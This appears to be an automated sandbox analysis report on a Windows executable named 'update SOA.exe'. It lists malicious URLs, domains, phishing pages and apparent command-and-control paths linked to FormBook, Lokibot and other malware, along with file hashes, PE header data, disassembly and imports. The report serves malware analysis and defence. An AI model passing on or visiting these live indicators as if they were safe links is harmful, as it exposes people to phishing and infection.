188.114.96.3 | http://fitur-dana-terbaru-2024.pages.dev/ | Get hash | malicious | HTMLPhisher | Browse | fitur-dana-terbaru-2024.pages.dev/favicon.ico
188.114.96.3 | http://mobilelegendsmycode.com/ | Get hash | malicious | Unknown | Browse | mobilelegendsmycode.com/favicon.ico
188.114.96.3 | http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE | Get hash | malicious | WinSearchAbuse | Browse | download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
188.114.96.3 | ADNOC requesting RFQ.exe | Get hash | malicious | FormBook | Browse | www.chinaen.org/zi4g/
188.114.96.3 | http://twint.ch-daten.com/de/receive/bank/sgkb/79469380 | Get hash | malicious | Unknown | Browse | twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
188.114.96.3 | Cbequipment-Voice Audio Interface.pdf | Get hash | malicious | HTMLPhisher | Browse | www.444317.com/
188.114.96.3 | Sept order.doc | Get hash | malicious | FormBook | Browse | www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
188.114.96.3 | 1e#U0414.exe | Get hash | malicious | Lokibot | Browse | dddotx.shop/Mine/PWS/fre.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
dxzz.top | UMOWA_PD.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 137.175.33.56
dxzz.top | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse | 137.175.33.56
www.cc101.pro | PO-100001499.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.cc101.pro | PO23100072.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.cc101.pro | PO-000001488.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.cc101.pro | PO2024033194.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.cc101.pro | PURCHASE ORDER-6350.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.dverkom.store | PO For Bulk Order.exe | Get hash | malicious | FormBook | Browse | 31.31.196.17
www.dverkom.store | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | 31.31.196.17
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | NCTSgL4t0B.exe | Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse | 188.114.96.3
CLOUDFLARENETUS | 4tXm5yPtiy.exe | Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse | 104.21.84.213
CLOUDFLARENETUS | https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12 | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
CLOUDFLARENETUS | UY9hUZn4CQ.exe | Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse | 104.21.1.169
CLOUDFLARENETUS | 4sTTCruY06.exe | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
CLOUDFLARENETUS | gh3zRWl4or.exe | Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse | 188.114.96.3
CLOUDFLARENETUS | seoI30IZZr.exe | Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse | 188.114.96.3
CLOUDFLARENETUS | docs.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
CLOUDFLARENETUS | https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true | Get hash | malicious | Unknown | Browse | 104.18.35.212
CLOUDFLARENETUS | https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0 | Get hash | malicious | Unknown | Browse | 1.1.1.1
NAMECHEAP-NETUS | shipping documents_pdf.exe | Get hash | malicious | FormBook | Browse | 162.213.249.216
NAMECHEAP-NETUS | Shipping Documents_pdf.exe | Get hash | malicious | FormBook | Browse | 162.0.238.238
NAMECHEAP-NETUS | Quote #260924.exe | Get hash | malicious | FormBook | Browse | 162.0.238.43
NAMECHEAP-NETUS | http://telegram-sex-naughty18.pages.dev/ | Get hash | malicious | Porn Scam | Browse | 162.213.255.57
NAMECHEAP-NETUS | https://purtroppopurtroppo-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lca | Get hash | malicious | Unknown | Browse | 63.250.43.5
NAMECHEAP-NETUS | https://tuttavia-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lca | Get hash | malicious | Unknown | Browse | 63.250.43.129
NAMECHEAP-NETUS | https://panthersaenimoine-fabc74.ingress-bonde.ewp.live/wp-content/plugins/abinbrevie/pages/region.php?lca | Get hash | malicious | Unknown | Browse | 63.250.43.2
NAMECHEAP-NETUS | https://urlz.fr/skxM | Get hash | malicious | Unknown | Browse | 63.250.43.1
NAMECHEAP-NETUS | Quote #270924.exe | Get hash | malicious | FormBook | Browse | 162.0.238.43
NAMECHEAP-NETUS | http://www.hongkong-post.frairza.com/ | Get hash | malicious | Unknown | Browse | 104.219.248.95
AS-REGRU | file.exe | Get hash | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | Browse | 194.58.114.223
AS-REGRU | file.exe | Get hash | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | Browse | 194.58.114.223
AS-REGRU | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 37.140.192.213
AS-REGRU | RTGS-WB-ABS-240730-NEW.lnk | Get hash | malicious | AgentTesla | Browse | 176.99.3.36
AS-REGRU | PO For Bulk Order.exe | Get hash | malicious | FormBook | Browse | 31.31.196.17
AS-REGRU | UMOWA_PD.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 194.58.112.174
AS-REGRU | CSBls4grBI.exe | Get hash | malicious | LummaC, Socks5Systemz | Browse | 194.58.114.223
AS-REGRU | 0435.pdf.exe | Get hash | malicious | SmokeLoader | Browse | 194.58.112.174
AS-REGRU | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
AS-REGRU | PO2024033194.exe | Get hash | malicious | FormBook | Browse | 194.58.112.174
PEGTECHINCUS | https://ole798.com/ | Get hash | malicious | Unknown | Browse | 192.74.233.14
PEGTECHINCUS | https://ojbkjs.vip/yb.js | Get hash | malicious | Unknown | Browse | 107.149.163.248
PEGTECHINCUS | https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a | Get hash | malicious | Unknown | Browse | 137.175.84.167
PEGTECHINCUS | https://tiktoksh0p.net/ | Get hash | malicious | Unknown | Browse | 104.37.215.2
PEGTECHINCUS | UMOWA_PD.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 137.175.33.56
PEGTECHINCUS | https://tk815.shop/ | Get hash | malicious | Unknown | Browse | 107.148.46.163
PEGTECHINCUS | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse | 137.175.33.56
PEGTECHINCUS | r8ykXfy52F9CXd5d.exe | Get hash | malicious | FormBook | Browse | 192.74.233.8
PEGTECHINCUS | Order#Qxz091124.exe | Get hash | malicious | FormBook | Browse | 107.148.62.45
PEGTECHINCUS | PO00211240906.exe | Get hash | malicious | FormBook | Browse | 107.148.62.45
No context
No context
Process:C:\Windows\SysWOW64\notepad.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:high, very likely benign file
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\update SOA.exe
File Type:data
Category:dropped
Size (bytes):288768
Entropy (8bit):7.993824652984272
Encrypted:true
SSDEEP:6144:3mUWxi7Bi+NitVZE3wCDu6TLYf/FKUegyldqx:31jBigiZE3w8u6TLYfK0
MD5:87680CE0F1813F50179FDE5449C057B5
SHA1:A4551A0B460B716B88BE1495412BA53D4F14D747
SHA-256:77FDD27A7D3DAFDBBB21B431676A5EF44D3ECBC3B04C383FBFDFC6582213D6E6
SHA-512:C68D5C2469DC2900B65E11E2DE0D7BC3D5A5E9945AA720254339F02801DD8B22984609AD2AE49603F9E8B97524DAFC2F2D703FB3895982272C3D008ABCFB3C10
Malicious:false
Reputation:low
                                                                                          Preview:}..e.QJ7R...Q.....QI..k6P...Z7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7.QJ7\W.;X.9.{.F.... *Fx%B8=E&<jT3&-Z,uR2zE2?j^<h.z.u]8>Ri\G=vHC5XU0W#6N.wW5.~U?..7=.]...h($.B.fW .P....U?.b>9_z1-.RHC5XU0W.rGQ.6SH...0WZ7GQJ7.HA4ST;WZaCQJ7RHC5XU.DZ7GAJ7R8G5XUpWZ'GQJ5RHE5XU0WZ7AQJ7RHC5X%4WZ5GQJ7RHA5..0WJ7GAJ7RHS5XE0WZ7GQZ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5v!U/.7GQ~cVHC%XU0.^7GAJ7RHC5XU0WZ7GQj7R(C5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQ
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.551097037711219
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: update SOA.exe
File size: 1'401'959 bytes
MD5: 309a3f5ca72ff071a0edd351eb3c6691
SHA1: 64a06df557469bda25a3d3b6526a9e7eade67f63
SHA256: cad71f61562fdc34dafc567081d21ff6044322ff75b67c3b5172fba7f4ee1e5d
SHA512: 077e1c99989b798471373d1950b924ccac9de73d8b3a5712c628422d5448027998427c51dfc7ca9c93e667968a123b3d60a760272e13953373a3004856aba057
SSDEEP: 24576:ffmMv6Ckr7Mny5QL+wCkHqv5Cgq5ub/xUXx/daqLXG8PPGFN0:f3v+7/5QLnCkHqB42/CXSeX
TLSH: 5155F212B7D680B6DDA339B11937E36BDB3575194323C4CBA7E02E768F211509B3A362
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
Icon Hash: 1733312925935517
Entrypoint: 0x416310
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: aaaa8913c89c8aa4a5d93f06853894da
Instruction
call 00007FBBDC95280Ch
jmp 00007FBBDC9465DEh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FBBDC94676Ah
cmp edi, eax
jc 00007FBBDC94690Ah
cmp ecx, 00000100h
jc 00007FBBDC946781h
cmp dword ptr [004A94E0h], 00000000h
je 00007FBBDC946778h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FBBDC94676Ah
pop esi
pop edi
pop ebp
jmp 00007FBBDC946BCAh
test edi, 00000003h
jne 00007FBBDC946777h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FBBDC94678Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FBBDC94676Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FBBDC94672Eh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
